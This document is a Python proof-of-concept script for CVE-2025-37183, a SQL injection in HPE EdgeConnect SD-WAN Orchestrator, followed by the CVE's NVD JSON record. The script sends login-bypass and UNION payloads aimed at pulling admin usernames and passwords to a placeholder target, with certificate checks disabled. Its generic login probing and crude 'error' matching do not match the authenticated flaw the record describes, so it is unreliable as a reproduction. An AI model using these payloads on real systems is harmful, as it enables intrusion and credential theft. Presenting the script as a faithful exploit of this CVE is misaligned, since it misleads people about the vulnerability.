CVE-2025-37183

import requests import sys # CVE-2025-37183 SQL Injection PoC # Target: HPE EdgeConnect SD-WAN Orchestrator target = "https://<target-ip>/orchestrator/" # SQL Injection payload for authentication bypass or data extraction payloads = [ "' OR '1'='1", "'; SELECT * FROM users--", "' UNION SELECT NULL,username,password,NULL FROM admin_users--", "' OR 1=1 LIMIT 1--" ] headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'JSESSIONID=YOUR_SESSION_ID' } def test_sql_injection(): for payload in payloads: data = { 'username': payload, 'password': 'anything' } try: response = requests.post(target + 'login', data=data, headers=headers, timeout=10, verify=False) if 'sql' in response.text.lower() or 'error' in response.text.lower(): print(f"[+] Potential SQL Injection found with payload: {payload}") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-37183 SQL Injection PoC") print("[*] Target: HPE EdgeConnect SD-WAN Orchestrator") test_sql_injection()

{"cve": {"id": "CVE-2025-37183", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:06.163", "lastModified": "2026-01-20T18:17:09.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation."}, {"lang": "es", "value": "Vulnerabilidades en la interfaz de gestión basada en web de EdgeConnect SD-WAN Orchestrator podrían permitir a un atacante remoto autenticado realizar ataques de inyección SQL. La explotación exitosa podría permitir a un atacante ejecutar comandos SQL arbitrarios en la base de datos subyacente, lo que podría llevar a un acceso no autorizado a datos o a la manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndIncluding": "9.2.10", "matchCriteriaId": "4972AD17-B8C3-4E30-B757-0B5BB830B28C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndIncluding": "9.3.6", "matchCriteriaId": "48DA7E3C-5E4C-4A91-872E-F278046A3146"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.4", "matchCriteriaId": "F65E7518-5652-4651-B8B8-25C763044E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.5.0", "versionEndExcluding": "9.5.6", "matchCriteriaId": "6C96154A-927C-4F4C-B00E-9E10340859A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5EBF5C1-4470-40F0-9812-1729E7E42DA0"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}